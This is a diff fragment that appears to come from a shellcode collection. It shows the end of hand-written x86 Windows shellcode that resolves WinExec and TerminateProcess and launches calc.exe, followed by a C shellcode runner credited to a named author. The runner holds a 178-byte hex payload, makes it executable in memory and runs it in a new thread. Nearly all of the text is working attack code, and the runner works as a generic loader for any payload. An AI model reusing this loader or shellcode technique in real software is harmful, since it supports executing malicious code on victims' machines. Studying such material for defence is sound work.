+  xor eax, eax                   ;      EAX = null
+  push eax                       ;      Push null-terminated string
+  push dword 0x6578652e		       ;
+  push dword 0x636c6163          ;
+  push esp                       ;      ESP = &(lpCmdLine)
+  pop  ebx                       ;      EBX save pointer to string
+
+ ; UINT WinExec(
+ ; LPCSTR lpCmdLine, -> EBX
+ ; UINT   uCmdShow 	 -> EAX
+ ; );
+
+ call_winexec:
+	xor eax, eax                   ;    EAX = null
+	push eax                       ;    uCmdShow
+	push ebx                       ;    lpCmdLine
+	call dword ptr [ebp+0x10]      ;    Call WinExec
+
+ ; BOOL TerminateProcess(
+ ; HANDLE hProcess,	 -> 0xffffffff
+ ; UINT   uExitCode	 -> EAX
+ ; );
+
+ terminate_process:
+	xor eax, eax                   ;    EAX = null
+	push eax                       ;    uExitCode
+	push 0xffffffff                ;    hProcess
+	call dword ptr [ebp+0x14]      ;    Call TerminateProcess
+
+
+[!]===================================== POC ========================================= [!]
+
+/*
+
+ Shellcode runner author: reenz0h (twitter: @sektor7net)
+
+*/
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+// Our WinExec PopCalc shellcode
+
+unsigned char payload[] =
+"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e"
+"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43"
+"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b"
+"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75"
+"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61"
+"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0"
+"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff"
+"\xff\x55\x14";
+
+
+unsigned int payload_len = 178;
+
+int main(void) {
+
+	void * exec_mem;
+	BOOL rv;
+	HANDLE th;
+  DWORD oldprotect = 0;
+
+	// Allocate a memory buffer for payload
+	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+	// Copy payload to new buffer
+	RtlMoveMemory(exec_mem, payload, payload_len);
+
+	// Make new buffer as executable
+	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+
+	printf("\nHit me!\n");
+  printf("Shellcode Length:  %d\n", strlen(payload));
+	getchar();
+
+	// If all good, run the payload
+	if ( rv != 0 ) {
+			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
+			WaitForSingleObject(th, -1);
+	}
+
+	return 0;
+}